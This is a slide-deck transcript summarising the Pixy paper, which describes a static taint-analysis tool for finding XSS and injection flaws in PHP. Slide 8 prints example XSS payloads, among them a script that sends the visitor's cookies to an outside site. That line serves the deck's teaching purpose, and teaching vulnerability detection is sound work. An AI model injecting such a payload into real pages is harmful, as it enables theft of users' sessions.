1 / 35

Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities

Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities. Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna University of Technology Proceedings of the IEEE Symposium on Security and Privacy. (May 2006). Outline. Introduction

Télécharger la présentation

Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Pixy: A Static Analysis Tool forDetecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna University of Technology Proceedings of the IEEE Symposium on Security and Privacy. (May 2006)

  2. Outline • Introduction • Taint-Style Vulnerabilities • Data Flow Analysis • Empirical Results • Conclusions • Comments

  3. Introduction(1/2) • There are urgent need for automated vulnerability detection in Web apps development. • The existing approaches for mitigating threats to Web apps can be divided into • client-side and server-side solutions • Server-side solutions: • Static approaches • Scan source code for vulnerabilities • Dynamic approaches • Detect while executing the audited program

  4. Introduction(2/2) • Pixy • The first open source tool for statically detecting XSS vulnerabilities in PHP4 code by means of data flow analysis • It can be applied to other taint-style vulnerabilities such as SQL injection or command injection • http://pixybox.seclab.tuwien.ac.at/pixy/index.php

  5. Taint-Style Vulnerabilities(1/2) • Of all vulnerabilities in Web apps, problem caused by unchecked input are recognized as being the most common • Inject malicious data in Web applications • Manipulate applications using malicious data • The authors refer to this class of vulnerabilities as the tainted object propagation problem • Referenced from “Finding security errors in Java programs with static analysis,. in Proceedings of the 14th UsenixSecurity Symposium, Aug. 2005”

  6. Taint-Style Vulnerabilities(2/2) • Tainted data • Originate from potentially malicious users • Cause security problems at vulnerable points in the program (called sensitive sinks) • May enter the program at specific places, and can spread via assignment and similar constructs • Can be untainted (sanitized) using a set of operations • Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities. • Differ only with respect to concrete values of few parameters

  7. Cross-Site Scripting (XSS)(1/2) • Occurs when dynamically generated Web pages display improperly validated input • An attacker may embed malicious JavaScriptcode into dynamically generated pages of trusted sites. • hijack the user account credentials • change user settings • steal cookies • insert unwanted content into the page

  8. Cross-Site Scripting (XSS)(2/2) • Reflected Cross-Site Scripting Attacks • Stored Cross-Site Scripting Attacks • An attacker's malicious script is rendered more than once <script>alert('Hello World');</script> <a href=“/usercp.php?action=logout”>一個關於兔子的網頁</a> <script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>

  9. Properties of XSS • Entry Points into the programs • GET: $_GET • POST: $_POST • COOKIE: $_COOKIE • entry points grows when the “register globals” is active • Sanitation Routines • htmlentities(), htmlspecialchars(), and type casts • Sensitive Sinks • echo() • print() • printf()…

  10. Data Flow Analysis(1/4) • Goal: To determine whether it is possible that tainted data reaches sensitive sinks without being properly sanitized. • Identify the taint value of variables used in these sinks • Statistically compute certain information for every single program point (or for coarser units such as functions) • PHP Front-End • construct a parse tree for PHP input file • transformed into linearized form resembling three-address code(TAC), and kept as a control flow graph for each encounter function • Assembly-like language • At most 3 operands • “x = y op z”

  11. Data Flow Analysis(2/4) • Operates on the control flow graph (CFG) of a program • A data structure built on top of the intermediate code representation abstracting the control flow behavior of a function that is being compiled • Node –atomic statement of program • Edge – flow of control

  12. Literal Analysis: Basics • Purpose: To determine, for each program point, the literal that a variable or a constant can hold. • Can improve the precision of the overall analysis by: • Evaluate branch conditions • Ignore program paths that cannot be executed at runtime (called path pruning) • Resolution of non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses) • After performing literal analysis • each CFG node is associated with information about which literal is mapped to a variablebefore executing that node

  13. How Data Flow Analysis is Used to Perform Literal Analysis • Assume a fictitious programming language • One variable (v) • Two literals (the integer 3 and 4) • “skip” node • empty instruction • “Ω” • Unknown literal

  14. Data Flow Analysis(3/4) • Carrier Lattice • Information about program represented using values from algebraic structure • Every information that could ever be associated with a CFG node by the analysis must be contained as an element of the used lattice • Bottom element : “not visited yet” at the biginning • Line: ordering between elements regard to precision • Least upper bound : the smallest element that is greater than or equal to both of the elements. Needed by the analysis algorithm

  15. Data Flow Analysis(4/4) • Transfer Function • f: PP for each node in control flow graph • Input: a lattice element • Output: a lattice element • Models effect of the node on the program information • Each CFG node is associated with such a transfer function

  16. Literal Analysis: Basics • Carrier Lattice Definition • Provides mappings for all variables and constants that appear in the scanned program • Able to describe the mapping to any possible literal (infinite)

  17. Literal Analysis: Basics • Transfer Function Definition • PHP without explicit type declarations “Hidden” array

  18. Four cases in order of increasing complexity 1. Not an array element and not known as array • strong update 2. An array, but not an array element • Array tree 3. Element without non-literal indices (may be an array) • strong overlap

  19. Four cases in order of increasing complexity 4. An array element with non-literal indices and maybe an array • weak overlap algorithm: all overwrite operations are replaced by least upper bound operations • Array elements with one or more non-literal indices are permanently mapped to Ω

  20. Ignoring the information of alias relationships would prevent literal analysis from producing correct results in a number of cases. Without alias analysis, literal analysis can’t decide that $a also affects $b $b remain unchanged and be incorrect! Alias Analysis

  21. Carrier Lattice Definition • Alias group: a group of variables referencing the same memory location • Modeling alias information through sets ofalias group sets • (…): an alias group • {…}: an alias group set • Must-aliasesof a variable • “{(a,b) (c)}” $b: must-alias of $a • May-aliases of a variable • “{(a,b) (c)} {(a,c) (b)}” $b and $c: may-aliases of $a • The order among lattice elements is defined as subset inclusion

  22. Static analysis is not able to decide which path the program will take • Under the assumption that the condition is determined by dynamic factors • Environment variables, user input

  23. Transfer Function Definition • Reference assignment • “$a = & $b” • Unset node • Own one-element alias group for each alias group set • Global node • Equally-name variable from the global scope on the right side • “global $a;” • The authors only consider references to simple variables

  24. Literal Analysis Revisited • Here we only consider references to simple variables • Functions built into PHP are conservatively modeled as returning Ω since the increased precision is expected to be rather small • only built-in function modeled precisely is “define”

  25. Literal Analysis Revisited • The transfer function at the call preparation node stores the alias information for the local variables of the calling function, and resets it to its default (initial) value • On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored again.

  26. Taint Analysis • Purpose: To determine, for each program point, the taint value (instead of the literal) of a variable or constant. • Possible to inspect whether any sensitive sink in the program is receiving malicious data, and hence, to detect vulnerabilities

  27. Taint Analysis • Carrier Lattice Definition • Tainted: if it can hold a malicious, not yet sanitized (checked) value originating from user input • Not map to Ω but to the tainted valuestaintedand untainted • mapped to tainted: this variable might be tainted. • mapping to untainted: this variable is untainted. • whenever the analysis cannot determine, it is conservatively assumed to be tainted

  28. Taint Analysis • Transfer Functions Definition • Implicitly casting a tainted variable into an integer untaints this variable • (with unary operators such as +, -, and (int)) • Correctly model built-in PHP functions can reduce the number of false positives • Pixy processes a specification file on startup which contains abstracted versions of some built-in functions in PHP syntax • “htmlentities” and “array” return $_UNTAINTED

  29. Taint Analysis • Using the Analysis Results • Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward. • The analysis information for each sensitive sink is searched for tainted input variables a • A warning message indicating the corresponding line is issued if such a violation is discovered

  30. Limitations • Pixy does not support object-oriented features of PHP. • Malicious data can never arise from such constructs. • Files included with “include” and similar keywords are not scanned automatically • The authors frequently observed false positives stemming from these lacking file inclusions • Eliminated through manual inclusion

  31. Empirical Results

  32. Empirical Results

  33. Conclusions • A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities • Additional literal analysis and alias analysis to improve correctness and precision of taint analysis • Pixy, an open-source Java tool that implements these analysis technique • Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate

  34. Comments • The first to perform alias analysis for an untyped, reference-based scripting language such as PHP • Beyond the scope of the paper • Recursive calls depends on dynamic information • Infinite call depth for non-terminating programs • The implementation is widely used by the public. • Future work • automatic inclusion of “include” files

More Related